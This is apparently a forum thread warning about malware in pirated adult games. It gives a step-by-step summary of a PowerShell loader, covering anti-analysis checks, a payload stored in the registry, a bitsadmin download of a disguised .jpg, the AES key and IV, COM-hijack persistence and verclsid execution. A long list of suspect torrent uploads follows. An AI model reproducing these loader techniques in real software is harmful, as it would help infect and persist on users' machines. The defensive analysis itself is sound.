Here's a clean, high-level summary of what the PowerShell script does, plus what we can infer about the decrypted zaesd payload.

PowerShell Malware — Behavior Summary
1. Environment & Anti-Analysis Checks
Silences errors to avoid visibility
Checks for analysis tools:
Sandboxie service
Procmon (Process Monitor)
If detected → stops execution immediately

Goal: avoid sandboxes and researchers

2. Randomization (Evasion)
Generates random names for:
DLL files
folders in AppData\Local
Avoids folders with spaces or suspicious names

Goal: make detection and signatures harder

3. Persistence Check
Looks for a specific registry CLSID key
If it already exists → exits

Prevents reinfection / duplicate installs

4. Fileless Payload Storage
Stores a Base64-encoded PowerShell script in:
HKCU:\Environment → MI_V
Stores execution path in:
MI_V2

This avoids writing the payload to disk initially

5. Delayed Execution (Stealth)
Creates a scheduled task
Executes 1 day later

Runs:

powershell -EncodedCommand %MI_V%

Helps bypass behavioral detection systems

6. Second Stage (Executed Later)
Download

Uses bitsadmin to download:

https://mgz.great-s***.n**/zaesd.jpg
Saves it disguised as .jpg

Actually not an image

7. Decryption (Critical Step)
Reads downloaded file
Decrypts using:
Parameter Value
Algorithm AES
Mode CBC
Key zbcd1j9234r670eh
IV same as key

Produces the real malware binary

8. Anti-Detection Mutation
Modifies last 2 bytes randomly

Changes file hash every execution

9. Payload Drop
Writes decrypted content as a DLL file
Saves in random AppData folder
10. Persistence (Advanced)
Uses COM Hijacking

Writes malicious DLL path into:

HKCU\SOFTWARE\Classes\CLSID\{GUID}

Forces Windows to load attacker DLL

11. Execution

Executes via:

verclsid.exe

Legit Windows binary (LOLBIN technique)

12. Cleanup
Deletes:
registry payload
scheduled task

Removes traces after execution

Decrypted zaesd Payload — What We Know

Even without full dynamic execution, based on structure:

Type
DLL (Windows PE file)
Likely compiled (C/C++ or .NET)
⚙ Behavior Indicators

From the loader design, this payload is likely:

A loader / stager
May download additional malware
Could act as entry point for larger infection chain
Possible capabilities
Command & Control (C2 communication)
Data exfiltration
Keylogging / credential theft
Process injection

My recommendation: I recommend avoid downloading pixeldrain games for now, specially uploads from new users, because of the 300+ links i found in the malware website.

This is the last part of my post on f95 for now.

PART 1.9 Update
 
Last edited:
  • Like
Reactions: Scale and kihon
I've created a updated and formatted version of the possible infected torrents from the user hentaigames36, he has 411 submissions and 4 were tested and confirmed as infected:

hentaigames36 411 torrent submissions tokyotosho (Newest to oldest) DECEMBER TO MAY:

[RJ01536243][29. 12. 2025]堕ちた女神リリスとサキュバス軍団[Japanese]. zip 2025-12-29

[RJ01496131][28. 12. 2025]ONAGONO QUEST EVE[Japanese]. zip 2025-12-28

[RJ01507389][28. 12. 2025]人妻剣士サツキの寝取られ売春記[Japanese]. zip 2025-12-27

[RJ01524403][28. 12. 2025](暴走)双子姉妹アンドロイドの性的な社会貢献[Japanese]. zip 2025-12-27

[RJ01535315][28. 12. 2025]姉妹搾取~純愛と寝取られの村~[Japanese]. zip 2025-12-27

[RJ01533597][27. 12. 2025]痴○の抜きズリ[Japanese]. zip 2025-12-26

[RJ01519862][27. 12. 2025]にゃくろのみこん![Japanese]. zip 2025-12-26

[RJ01533503][27. 12. 2025]ちんたらレベル上げてる場合じゃねえ![Japanese]. zip 2025-12-26

[RJ01318417][26. 12. 2025]製品版 _滅びの街のエトランジェ v1. 0. 0 Etranger in the city of doom[Japanese]. zip 2025-12-26

[RJ01475186][26. 12. 2025]息子のあとしまつ~母さんとのエッチはすべてアニメ!簡単すぎる母子RPG!エッチイベント270個(搾乳差分多めです!)~[Japanese]. zip 2025-12-26

[RJ01476568][26. 12. 2025]マスターマインド _Ver1. 00[Japanese]. zip 2025-12-26

[RJ01534775][26. 12. 2025]ハロルドの淫らな冒険episode12古代遺跡の秘密[Japanese]. zip 2025-12-26

[RJ01512978][27. 12. 2025]インランカンパ~淫魔VS天使VSショタ~[Japanese]. zip 2025-12-26

[RJ01521518][27. 12. 2025]探偵騎士ダイアナ[Japanese]. zip Website 2025-12-26

[RJ01530723][25. 12. 2025]【M男専用顔面愛撫専門店】唾淫奴〇-だーいんすれいぶ-[Japanese]. zip 2025-12-24

[RJ01524667][25. 12. 2025]もっと!格闘娘はお金が無い!Ver1. 00 追加パッチ[Japanese]. zip 2025-12-24

[RJ01339308][25. 12. 2025]X-Angels ~正義で堕とせ!美少女ヒーロー~[Japanese][Chinese][Korean][English]. zip 2025-12-24

[RJ01416500][22. 12. 2025]SweetLife 〜幸せな毎日が、寝取られに染まるまで〜[Japanese]. zip 2025-12-23

[RJ01525197][19. 12. 2025]極煌戦姫ミストルティア2 黒の女王と逆襲の淫獄[Japanese]. zip 2025-12-23

[RJ01503646][24. 12. 2025]マナちゃんと暮らす孤島生活[Japanese]. zip 2025-12-23

[RJ01533009][24. 12. 2025]ヨウセイ![Japanese]. zip 2025-12-23

[RJ01525900][23. 12. 2025]ずっと好きだった男勝りな幼馴染が転校生のチャラ男に寝取られる[Japanese]. zip 2025-12-23

[RJ281539][23. 12. 2025]おっぱい剣士がクエストしてたら魔王討伐してました[Episode 01][Japanese]. zip 2025-12-23

[RJ01505455][22. 12. 2025]爆乳盗賊と爆乳騎士をわからせてみた[Japanese]. zip 2025-12-22

[RJ01398479][06. 06. 2025]A Clumsy Shrine Maiden in Succubus Island[English]. zip 2025-12-22

[RJ01450546][15. 09. 2025]NTR物語2〜ダークウォーカーマストダイ〜[Japanese]. zip 2025-12-22

[RJ01377184][19. 08. 2025]地下送りにされた不良お嬢様が人間以下に堕ちるまで[Japanese]. zip 2025-12-22

[RJ01519121][05. 12. 2025]Brainwashing with Tentacles R[English]. zip 2025-12-22

[RJ01525428][23. 12. 2025]箱入り娘と小旅行[Japanese]. zip 2025-12-22

[RJ01507660][28. 11. 2025]竿役おじさん、サキュバスハンターになる~サキュバスをセックスで倒していくバトルファックRPG~[Japanese]. zip 2025-12-22

[RJ01511106][29. 11. 2025]くノ一忍法帖 お千代[Japanese]. zip 2025-12-22

[RJ01484777][21. 12. 2025]さくらエグゼック特別救急警備部性処理課[Japanese]. zip 2025-12-20

[RJ01449864][20. 12. 2025]アリス・イントルードMZ~敵地に潜入した女エージェントチームがどちゃくそエロい目に遭うゲーム~[Japanese]. zip 2025-12-20

[RJ01503729][20. 12. 2025]淫魔と魔狩人[Japanese]. zip 2025-12-19

[RJ01526843][20. 12. 2025]ミミズ井戸。[Japanese]. zip 2025-12-19

[RJ01524136][20. 12. 2025]NTRギャル -オタクに優しいギャルは寝取られる-[Japanese]. zip 2025-12-19

[RJ01507381][20. 12. 2025]うわさの催○村~来るもの全員オナホ化~[Japanese]. zip 2025-12-19

[RJ01286782][18. 12. 2025]雨のバケモノ[Japanese]. zip 2025-12-18

[RJ01412576][19. 12. 2025]アンホーリーメイデン - Unholy maiden[Japanese]. zip 2025-12-18

[RJ01443794][19. 12. 2025]魔法少女アスターリクス・監獄回廊からの脱出[Japanese]. zip 2025-12-18

[RJ01477834][19. 12. 2025]浣腸変身エネマリア[Japanese]. zip 2025-12-18

[RJ01509772][19. 12. 2025]カーテンのむこう NTR[Japanese]. zip 2025-12-18

[RJ01497069][19. 12. 2025]大食い怪獣姫 惑星のグルメ旅[Japanese][Chinese][Korean][English]. zip 2025-12-18

[RJ01525446][19. 12. 2025]背徳射精 ドキドキ潜入調査〜あなたは一線を越えられるのか〜[Japanese]. zip 2025-12-18

[RJ01520860][13. 12. 2025]触手クンの大冒険[Japanese]. zip 2025-12-17

[RJ01502865][11. 11. 2025]退魔巫女はるな-惨-[Japanese]. zip 2025-12-16

[RJ01234887][12. 12. 2025]堕ちた女司祭:妹の悪魔の血 アップデートVer 1. 1. 0[Japanese][Cninese][Korean][English]. zip 2025-12-16

[RJ01501066][15. 11. 2025]FGORPG ~ecstasy~ ~エクスタシー~[Japanese]. zip 2025-12-16

[RJ01300273][17. 12. 2025]シスタはみんなのオナホです!!~7日間の〇隷性活~[Japanese]. zip 2025-12-16

[RJ01507212][01. 12. 2025]魔王城再防衛戦記[Japanese]. zip 2025-12-16

[RJ01473444][03. 12. 2025]推しのVtuber箱に10憶投げ銭したら俺だけの中出しハーレムを手に入れた件[Japanese][Chinese][Korean][English]. zip 2025-12-15

[RJ01515213][05. 12. 2025]ヨリドコロ ー 男系女子との夏の思い出 ー[Japanese]. zip 2025-12-15

[RJ01079745][21. 05. 2024]援助妊娠學園 V3. 1 Ending 1[Japanese]. zip 2025-12-15

[RJ01517680][06. 12. 2025]幻境の蜜籠[Japanese]. zip 2025-12-15

[RJ01522090][11. 12. 2025]催○戦記〜異世界転生編〜[Japanese]. zip 2025-12-15

[RJ01409227][24. 11. 2025]ダンジョンなんて行かなければよかったVer1. 1. 2[Japanese]. zip 2025-12-15

[RJ01042589][RJ01492838 DLC][12. 12. 2025]砂漠王国と奴○狩り ~Append~[Japanese][Chinese][English]. zip 2025-12-15

[RJ01509293][15. 12. 2025]Peeping MySchool 盗撮が救う未来もある![Japanese]. zip 2025-12-15

[RJ01524662][13. 12. 2025]お嬢様は孕みたい[Japanese]. zip 2025-12-15

[RJ309598][09. 12. 2025]きらめく地平線と呪われた鍛冶屋v. 1. 04[Japanese][Chinese][English][Russian]. zip 2025-12-14

[RJ01525036][15. 12. 2025]古明地姉妹が異世界でハルウリご奉仕する話[Japanese]. zip 2025-12-14

[RJ01526574][15. 12. 2025]足りない勇者とツイてる仲間たち[Japanese]. zip 2025-12-14

[RJ01486684][14. 11. 2025]潜入捜査官レイ 〜豪華客船武闘会〜[Japanese]. zip 2025-12-14

[RJ01509975][10. 12. 2025]アルカワット聖訪記 製品版[Japanese]. zip 2025-12-14

[RJ01518767][13. 12. 2025]ボンバーRPG ~galaxy world~[Japanese]. zip 2025-12-14

[RJ01522545][13. 12. 2025]IDOL CONFLICT アイドル紛争[Japanese]. zip 2025-12-14

[RJ01522519][12. 12. 2025]夢侵入NTR~人妻4人は夢で寝取られ堕ちてゆく催○RPG~[Japanese]. zip 2025-12-14

[RJ01525485][14. 12. 2025]【3Dおさわり特化】処女巫女の霊力供給えっち ─恋人の妹にぶっかけ中出し─[Japanese][Chinese][English][Korean]. zip 2025-12-13

[RJ01169914][08. 10. 2025]シニシスタ2 SiNiSistar2[Japanese][Chinese][English]. zip 2025-12-12

[RJ01524502][13. 12. 2025]ダンジョン肉[Japanese]. zip 2025-12-12

[RJ01208336][13. 12. 2025]獣退魔師[Japanese]. zip 2025-12-12

[RJ01511771][13. 12. 2025]ボニー&トレイシー[Japanese]. zip 2025-12-12

[RJ01523547][10. 12. 2025]お前の妻のマンコ[Japanese][Chinese][English]. zip 2025-12-12

[RJ01415704][12. 12. 2025]従者クンの風俗経営-製品版ver. 1. 02[Japanese]. zip 2025-12-12

[RJ01468362][13. 09. 2025]女潜入官ライカ ~恥辱の潜入~[Japanese]. zip 2025-12-12

[RJ01500551][12. 12. 2025]おなクラ メイドライフ~クラスのギャルメイドとリゾートご奉仕性活~[Japanese]. zip 2025-12-11

[RJ01519305][12. 12. 2025]竜と獣が沈む水槽[Japanese]. zip 2025-12-11

[RJ01524093]破壊神、童貞すてます![Japanese]. zip 2025-12-11

[RJ01504806][ぱいそん]潜入捜査員ダイアナ[Japanese]. zip 2025-12-11

[RJ01507765][ぱいそん]サキュバスの受難[Japanese]. zip 2025-12-11

[RJ01515504][ハチマル]ハチマルパック 5周年アニメ&ゲームエディション[Japanese]. zip 2025-12-11

[RJ01379852][みるくせーき]彼氏が出来た元カノに恋をした。 ~元カノのカラダは俺を覚えている~[Japanese]. zip 2025-12-11

[RJ01467509][赤宮もず]猫又あやかし伝[Japanese]. zip 2025-12-11

[RJ299558][マイケルサンダーぱぴぷぺぽ]タナトス-Thanatos-[Japanese]. zip 2025-12-10

[RJ01516498][マタタビ猫soft]色仕掛けMシチュRPGシリーズ2本セット[Japanese]. zip 2025-12-10

[RJ01520126][Are!]しねないからだ[Japanese]. zip 2025-12-10

[RJ01521166][えるぶ]NPC姦 最初の村編 〜ゲームの世界に転生してしまったのでNPCを好き放題に犯し尽くす〜[Japanese]. zip 2025-12-10

[RJ01511100][猫尺]エルフの戦士 アンジェラ[Japanese]. zip 2025-12-10

[RJ01523279][クラヤミノソラ]Bad Calling3~無様と恥辱で彩る戴冠の物語~[Japanese]. zip 2025-12-10

[VJ01004765][でぼの巣製作所]神楽新風記 ~護の章~[Japanese]. zip 2025-12-10

[RJ01522194][OreNo小屋]NTRヒロイン 純白正義ホワイトスノウ[Japanese]. zip 2025-12-10

[RJ01200699][愚痴ヲタ畑]H英知探求性質!ver1. 501[Japanese]. zip 2025-12-10

[RJ01154220][黒タイツ同好会]UNDER COVER ~サイバーパンクエロRPG~[日本語]. zip 2025-12-10

[花鳥ゆう][世間知らずの猫エルーシャ体ver0. 266][日本語]. zip 2025-12-09

[最強ヒーラーの奴隷譚体験ver2. 58][日本語]. zip 2025-12-09

[RJ01445126][イカ腹友の会]水着の国のアリス[日本語]. zip 2025-12-09

[251205][Fantasy Games]四つん這いの赤ずきん Red Riding Hood on All Fours[Japanese][Chinese][English]. zip 2025-12-09

[RJ01366739][やまいもやまもも]"囚人兵"魔法少女野中カレン[Japanese]. zip 2025-12-08

[250318][自宅すたじお Shiravune]リアルエロゲシチュエーション!DT 多国語版[Chinese][English]. zip 2025-12-08

[RJ01217604][BouSoft]なまいき娘と見えない幽霊 Ver2. 3. 1 & DLC[Japanese][English]. zip 2025-12-08

[RJ01510245][魔法少女倶楽部]あまあまらぶ妹らいふ ~恋人はお兄ちゃん~[Japanese]. zip 2025-12-08

[241127][隣の奥さん][無修正]The Wife Next Door Uncensored Ver1. 6. 9[Japanese][Chinese][English]. zip 2025-12-07

[251008][雪×姫][無修正]Snow x Hime Uncensored[Japanese][Chonese][English]. zip2025-12-07

[251121][熟女セックス刑務所セクターX][無修正]MILF Sex Prison Sector X[Uncensored][Japanese][Chonese][English]. zip 2025-12-07

[RJ01485956][Chrono]都市催○~町中の女犯し放題~[Japanese]. zip 2025-12-07

[251129][いぬ]ポストアポカリプス-繁殖と禁忌の英雄-[d _705319][Japanese]. zip 2025-12-07

[RJ01513084][GPOINT GAME]Far Star ファースター[Japanese][English]. zip 2025-12-07

[RJ01484794][ヴィンセント]NTREX Classmate ネトラレックス クラスメイト[Japanese]. zip 2025-12-07

[RJ01486802][あんがるど]カンナと淫欲の館[Japanese]. zip 2025-12-07

[RJ01521505][猫尺]潜入捜査官ブリトニー[Japanese]. zip 2025-12-07

[RJ01517893][としお丸]巨乳女神[Japanese]. zip 2025-12-07

[251205][まぐちゃん]Sweet Life ~幸せな毎日が、寝取られに染まるまで~[Japanese][Chinese][English]. zip 2025-12-06

[Dirty Adventures][Sex Wishes][Uncensored][セックス願望][無修正][Japanese][Chinese][English]. zip 2025-12-06

[Hot And Lovely 4 Final ホット・アンド・ラブリー4 ファイナル][Lovely Games][English][Japanese][Chinese][Korean]. zip 2025-12-06

[RJ01155678][BABYLON]異世界出戻り学園[Japanese]. zip 2025-12-06

[RJ01496118][平板の世界]聖幻 仮面姫 – オーロラ. クリスタル 追放された機械の楽園[Japanese]. zip 2025-12-06

[RJ207672][ディーゼルマイン]或る館にてVer1. 2[Japanese]. zip 2025-12-06

[RJ01508826][おとめプラス]見習い錬金術師とエロトラップダンジョン[Japanese]. zip 2025-12-06

[RJ123731][Norn Miel Cybele]ハーレムファンタジー!思春期妄想勇者の子作り冒険譚[Japanese]. zip 2025-12-05

[RJ01519014][のーすぴっち]SA●Ghost Protocol[Japanese]. zip 2025-12-05

[RJ01317801][Duskcraft]ショタ天使のハーレム[Japanese]. zip 2025-12-05

[RJ01483966][ルミナストア]汗だくセックスをするならどのグループを選ぶ!〜無限NTR編〜[Japanese]. zip 2025-12-05

[RJ01351281][Grown-app]個撮はじめました[Japanese]. zip 2025-12-05

[RJ309598][Ason]蒼キ光と魔剣の鍛冶師[Japanese][Chinese][English][Russian]. zip 2025-12-05

[RJ01499583][sinabi ninja village]紅焔忍姫トウカ -淫魔堕落姫譚-[Japanese]. zip 2025-12-05

[RJ01398124][白夜彩夢]あ、幽霊[Japanese]. zip 2025-12-05

[RJ01491971][ultra]町の看板娘が権力者に目を付けられるお話[Japanese]. zip 2025-12-05

[251031][Lusterise] 光翼戦姫エクスティアコンチェルト フィナーレ (Cracked). zip 2025-12-04

[VJ01003026][アトリエさくら]脅され妻・美波(みなみ) ~夫の知らぬ間に他の男へ媚肉奉仕していた最愛妻[Japanese]. zip 2025-12-04

[251111][Cabbage Soft]甘色ショコラータ3 Amairo Chocolata 3[Eng][Jpn][Chn]. zip 2025-12-04

[251021][Playmeow, ACG creator]堕落エルフ・フレイヤ – Fallen Elf Freya(ver1. 2)[ENG][JPN][CHN]. zip 2025-12-04

[251113][HappyCreator]ハッピーアイランドファンタジー Uncensored (ver1. 1. 0. 3)[JPN][CHN][ENG]. zip 2025-12-04

[RJ287775][HONEYSOFT]月紅神姫コーネリア (Ver1. 12)[Japanese]. zip 2025-12-04

[RJ01422252][RJ01497775全えっち解放DLC][猫project(仮)]野良猫少女との生活 CAT Girl Sweet Days (ver1. 50)[JP]. zip 2025-12-04

[RJ431925][八角家]ハチナ怪異譚 (Ver1. 13)[JP][ENG][CHN]. zip 2025-12-04

[RJ0148454][FT少女]Crossdresser Killer[Japanese]. zip 2025-12-04 17:21

[RJ01400992][Mango Party]NTRアイドル – 夢の約束(ver2. 05)[JP][CN][KR][EN]. zip Date: 2025-12-03

[RJ331590+RJ0103614+RJ01063435+RJ01260870][Remtairy(レムテイリー)]カリンズ・プリズンKARRYN'S PRISON(Ver1. 3. 1. 28)+3DLC[Japanese]. zip 2025-12-03

[RJ01485082][同人ゲーム][さんじくソフト]半堕ちの魔法少女[Japanese]. zip 2025-12-02 15:07

[RJ01483508][かんた食堂]ひかえめ魔女 アイラの受難[Japanese]. zip 2025-12-02

[RJ409598][腹持ちのいい心臓]淫楽の世界樹より2~悪竜と三人の魔女~[Japanese]. zip 2025-12-02

[251128][1316696][ま~まれぇど] バカップル・サプリメント DL版 (files). zip 2025-12-01

[RJ01458161][同人ゲーム][肉と餅]Tales of Alice[English]. zip 2025-12-01

[251025][同人ゲーム][鷹乃ゆき][Orcsoft]Isekai Revitalizer (ENG)[Final][English]. zip 2025-12-01

[251108][同人ゲーム][鷹乃ゆき][EmadePlus]Mad Island (Uncensored)(Ver0. 4. 5. 6) + DLC[Japanese][Chinese][English]. zip 2025-12-01

[251128][綾瀬水音][鷹乃ゆき][わるきゅ~れ] ビッチスイッチ☆レボリューション~放課後ギャルビッチ搾精プレイリスト~[Japanese]. zip 2025-12-01 19:33

[RJ01381000][山田美纪男©]無条件の服従[Japanese]. zip 2025-12-01

[251128][Whirlpool][鷹乃ゆき]猫忍えくすはーとSPIN!2[Japanese]. zip 2025-12-01

RJ278424. zip 2025-12-01

RJ01504798. zip 2025-11-30

RJ01510646. zip 2025-11-30

RJ01507455. zip 2025-11-30

RJ01487356. zip 2025-11-30

RJ295122. zip 2025-11-30

RJ01515297. zip 2025-11-30

[RJ01516355][さーくる亀]撃電妖異譚─Appendix─[Japanese]. zip 2025-11-29

[RJ01380813][GR8BUNNY商会]フロンティアガーディアンーNTRと快楽堕ちと催○とー[Japanese]. zip 2025-11-29

[RJ01507457][みるくせーき]地域人妻孕ませ調査隊![Japanese]. zip 2025-11-29

[RJ01482684][きょうりゅうらんど]最低ギャルの人生を終了できる復讐アプリ[Japanese]. zip 2025-11-29

[RJ01369804][・工房]カードナー Adult・Edition[Japanese]. zip 2025-11-29

[RJ01490597][ふじきの]紗雪さんと仔鹿。[Japanese]. zip 2025-11-28

[RJ01492380][アリスティアソフト]くノ一あやめ忍法帖[English]. zip 2025-11-28

[RJ01453643][PlumSoftware]寝取らせ上手な山田さん[Japanese]. zip 2025-11-28

[Click Her Version 1. 0. 3. 3][FleshForge Studio][Chinese][Korean][English]. zip 2025-11-28

[240716][ペリカンサークル]おねショタキングダム[d _418499][Japanese]. zip 2025-11-27

[RJ01247176][レイガン]眠眠打鬼 ―minmin da gui― Ver1. 1. 0[Japanese]. zip 2025-11-27

[251024][あいがめ]幻境の蜜籠[d _600217][Japanese]. zip 2025-11-27

[RJ01493694][エロエロ天国]催○洗脳〜完堕ちオフィス編〜[Japanese]. zip 2025-11-27

[RJ01454706][CSGAME]女幽霊の秘められた治療[Japanese][Chinese][English]. zip 2025-11-27

[RJ01388042][wolfzq]呪いの鎧II(霊魔女傳奇)Cursed Armor 2 Ver. 7. 0. 5[Japanese][Chinese][English]. zip 2025-11-27

[RJ01495390][bba]巨女と儀式 Ver1. 7[Japanese]. zip 2025-11-27

[RJ01494478][エロエロ天国]催○アプリ支配〜完堕ち学園編〜[Japanese]. zip 2025-11-27

[RJ01170876][レイガン]ダーク・キャプチャ[Japanese]. zip 2025-11-27

[RJ01400116][たいやき市場]つるぺたえっちぷれいや[Japanese][English]. zip 2025-11-27

[RJ01476243][プスっと18ゲージ]どこまで出来るコスプレJDと個人撮影会![Japanese]. zip 2025-11-27

[RJ01485014][フェチズム製作所]冒険者リザシア -葛藤と屈辱の3日間- Ver. 2025. 11. 09[Japanese]. zip 2025-11-26

[RJ01499588][雨宿り蛙]NTRダンジョン Ver1. 03[Japanese]. zip 2025-11-26

[RJ01438417][ラッキースケベ日記たかしくん@CFNM]HAJI NOTE 恥x辱[Japanese]. zip 2025-11-26

[RJ01506310][鈴鳴堂]リィベルが叡智なビジュアルノベル[Japanese]. zip 2025-11-26

[RJ01484195][LIMIT CYCLE]空飛ぶハーレム城の秘密 Ver1. 01[Japanese]. zip 2025-11-26

[RJ01402070][ディーゼルマイン]SUMMER ~夏の14日~[Japanese]. zip 2025-11-26

[RJ01471471][リリアムオーラタムン]女の子の部屋は初めてThe Girl's Room[Japanese]. zip 2025-11-26

[251031][トンチキパンチ]ウィッチハンター〜2号もちょろいぜ〜 ダウンロード版[+特典][Japanese]. zip 2025-11-26

[RJ01495317][浮根床]クルセイドメイデン Ver1. 01[Japanese]. zip 2025-11-26

[RJ01487243][Azastar]聖杯都市[Japanese]. zip 2025-11-26

[RJ01482469][さぃヵゎょぅι゛ょ]催○アプリNTR 男たちの精液処理係にされる姉妹 心音と詩乃[Japanese]. zip 2025-11-26

[RJ01361631][わいるどかーど]屈辱受精ロロン~ボテ堕ち屈服宣言まであとX日~[Japanese]. zip 2025-11-26

[RJ01501023][もんじゃキングダム]画面のウラガワ[Japanese]. zip 2025-11-26

[RJ01427006][桃狐の変態調教課題]桃狐の変態調教課題[Japanese]. zip 2025-11-25

[RJ01500276][墳丹吉(ふんにきち)]墳丹吉(ふんにきち)] デカパイ!メ○ガキバニーさん[Japanese]. zip 2025-11-25

[RJ01484750][citore]彼氏の知らない秘密の3日間ー寝取られ中だし快楽堕ち[Japanese]. zip 2025-11-25

[RJ01497062][サークルfujiko]緊縛す◯せ◯クリッカー[Japanese]. zip 2025-11-25

[Symphony Of The Serpent Version 48112][NLT Media][RPG Adventure][English]. zip 2025-11-24

[Three And One The Cursed Mansion Version 0. 26][Visual Novel][English]. zip 2025-11-24

[RJ01249412][プロジェクトFW]楽園のローレライ[Japanese]. zip 2025-11-24

[RJ01454365][Aquamoon]悪魔と猫娘-ドキドキの冒険が始まる[Japanese]. zip 2025-11-24

[RJ01124757][マゾゲー団]色仕掛けエロRPG4作セット2【過去作セット販売】[Japanese]. zip 2025-11-24

[RJ01474124][へいせん堂]しのちゃんと露出命令[Japanese]. zip 2025-11-24

[RJ01448148][えるぶ]しのちゃんと露出命令[Japanese]. zip 2025-11-24

[RJ01409255][猫ナース実験室]アリサの霊感インシデントレポート[Japanese]. zip 2025-11-24

[RJ01313544][アガシー魂]聖女は淫魔の時を[Japanese][Chinese][English]. zip 2025-11-24

[RJ01483323][ぶるぱら魂]噂のくち裂け女は地雷系美少女だった退治できるのか神主君[Japanese]. zip 2025-11-24

[RJ01511271][77Love]魔道具調査員と淫牢ノ館[Japanese]. zip 2025-11-24

[RJ01511868][からあげカンパニー]反抗的な義妹(きみ)が堕ちるまで[Japanese]. zip 2025-11-24

[RJ01278926][たわわデリバリー]LOOK. hacII -ルック・ハックII-[Japanese][English][Chinese][Korean]. zip 2025-11-23

[RJ01410771][10円はげ。]DARKGATE 虚空の淫獄[Japanese][English]. zip 2025-11-23

[RJ01486335][リボン]俺の妊娠家系図 妻と娘…孫娘まで俺の精子で妊娠させる![Japanese]. zip 2025-11-23

[RJ01372043][未亜見あみ]ふたなり魔法少女フタナティア ~愛と淫欲のサイバーシティ~[Japanese]. zip 2025-11-22

[RJ01430972][エンタングルメント]りりずでいず~屈服NTRライフとアオハルHAPPYライフ~[Japanese]. zip 2025-11-22

[RJ323590][豹兵のジャガー団]魔砲少女フタナ[Japanese]. zip 2025-11-22

[RJ01481895][カラフレシマ]セックス実習のある島で[Japanese]. zip 2025-11-22

[RJ01477200][しるくぱんくす]バトるん☆Live!![Japanese][English]. zip 2025-11-22

[RJ01512097][大自然重工]穢れたエルフと不浄の迷宮[Japanese]. zip 2025-11-22

[RJ01508794][石垣]ETERNAL ROMANCE 完成版 Plus DLC[Japanese]. zip 2025-11-22

[RJ01234887][BBQ大好き]影に染まりゆく~アスリントの妹神官~[Japanese][Chenese][English]. zip 2025-11-22

[RJ01423028][アンナ]NPC姦3D ~海辺の町とエロMOD[Japanese]. zip 2025-11-22

[RJ01387722][リインカネイト]性処理用勇者[Japanese]. zip 2025-11-21

[RJ01504758][フロントランニャー]イカサマじゃんけん[Japanese]. zip 2025-11-21

[Home Together Version 0. 39][Home Together][English]. zip 2025-11-20

[RJ01503207][サモナベール]ホムラとエロトラップダンジョン[Japanese]. zip 2025-11-20

[RJ01396599][にほほひ]アカネの冒険[Japanese]. zip 2025-11-20

[RJ01474142][したっけゲームズ]絶頂退魔がーるれのちゃん ~射精させるのがお仕事です!~[Japanese]. zip 2025-11-20

[RJ01467184][溺水船リリオン]魔法少女るなとななみ-悪の遺伝子を孕まされる母娘-[Japanese]. zip 2025-11-20

[RJ01287158][虚数神域]ニューロン・エクリプス[Japanese]. zip 2025-11-19

[RJ01479274][ぴゅっぴゅ]タニンボーズエクスタシー!~僕の彼女がパワハラ上司に寝取られる~[Japanese]. zip 2025-11-19

[RJ01491950][しろふくろう]エルミナストーリー[Japanese]. zip 2025-11-19

[RJ01409711][ユキユキ]胎動の檻・聖母体にされた少女達[Japanese]. zip 2025-11-19

[RJ01260797][たろバウム]リヴィアとの性活【Live2D×フルボイス】[Japanese]. zip 2025-11-19

[RJ01124242][セイヘキマスター]ハニートラップ・エスケープ〜悪役一家と囚われのお屋敷〜[Japanese]. zip 2025-11-19

[RJ01491590][ヴォイニッチプリン]鉄脚のカエン[Japanese]. zip 2025-11-18

[RJ01492692][蒼桜]ヒロイック スピリット!-女だらけのヴィラングループに立ち向かうRPG-[Japanese]. zip 2025-11-18

[RJ01501553][os式(オスシキ)]みせつけ[Japanese]. zip 2025-11-18

[RJ01317573][非情口行き]魔法の里の繁栄事情 -天才魔法少女マリーと孕ませの儀式-[Japanese]. zip 2025-11-18

[RJ01502488][ナデシコデシコ]密 ~狭間の女達~[Japanese]. zip 2025-11-18

[RJ01154569][BAROQUPID]サイレント・クライ[Japanese]. zip 2025-11-18

[RJ01455509][Omshinwa18]Dating Joyceデッキ構築ゲーム[Japanese]. zip 2025-11-18

[RJ01399875][梅麻呂3D]セックスセラピスト GAME版[Japanese]. zip 2025-11-18

[RJ01397058][みるくせーき]女番長をわからせたい! ~俺のデカチンでわからせてやる~[Japanese]. zip 2025-11-18

[RJ01391735][鯖缶パスタ酢]ウィルネスト物語 特務一課と不貞の遺跡[Japanese]. zip 2025-11-17

[RJ01404403][あーるあーるあーる]まとめ売り】アー〇ャさん&周防 〇希とえっち【VR専用】[Japanese]. zip 2025-11-17

[RJ01406717][テンかす]バイオテクナーサ[Japanese]. zip 2025-11-17

[RJ01463218][くじら1%]もぎたて☆サマービーチ[Japanese]. zip 2025-11-17

[RJ01299263][ヴォイニッチプリン]エロコス着せ替え災難譚 ~日焼け跡差分もあるよ♪~[Japanese]. zip 2025-11-17

[RJ01034061][三代錆]佐谷霞巳はあなたがいないと生きられない[Japanese]. zip 2025-11-16

[RJ01330017][ウーブル美術館]チンポミルクを飲もう!![Japanese]. zip 2025-11-07

[RJ01496686][流水]恥辱連鎖[Japanese]. zip 2025-11-07

聖痕のアリア 第1話 冒険の始まり、聖なるご奉仕 2025-11-0

[RJ01266688][TIFON STUDIO EIROS]最果てのオケアニデス~爆乳水着美女守護者伝説~[Japanese]. zip 2025-11-06

[RJ01464808][Ver1. 1][A86GJ3]【Live2D】巨乳魔女お姉さんのおっぱいに負けた![Japanese]. zip 2025-11-06

[RJ01446428][ハーフトーンドット]【VR版】完全支配ランダム満員電車[Japanese]. zip W2025-11-06

[RJ01456318][June]【Live2Dおさわりゲーム】ユキヒョウ人妻との性感マッサージ[Japanese]. zip 2025-11-06

[RJ01498703][レアドロップ]沙耶子の子宮婚約NTR[Japanese]. zip 2025-11-06

[RJ380098][栗pick]マインド・リュダ[Japanese]. zip 2025-11-05

[RJ01454612][MarunomiKobo]淫辱鉱町セレナ ~エルフ少女と淫欲の鉱坑譚~[Japanese]. zip 2025-11-05

[RJ01444583][ミーナ]マゾ×ザコ クエスト[Japanese]. zip 2025-11-05

[RJ01402283][腰の火]その快楽、任務違反。[Japanese]. zip 2025-11-05

[RJ01411618][しもケンタロス]常識改変 傲慢な女騎士が化け物に洗脳性奴○にされる話[Japanese]. zip 2025-11-05

[RJ01450857][異世界]魔物の森[Japanese]. zip 2025-11-05

[RJ01466829][URURUC]ふたなりお嬢様との秘密取引[Japanese]. zip 2025-11-04

[Lust Harem 1001 Pleasures][Dirty Adventures][Japanese][Korean][Chinese][English]. zip 2025-11-04

[RJ01310700][凱聖堂]スーパーむちフェチ大戦DX[Japanese]. zip 2025-11-04

